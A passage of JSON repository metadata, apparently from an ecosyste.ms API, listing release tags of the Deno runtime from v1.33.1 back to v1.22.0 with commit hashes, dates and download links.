ncy_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://rep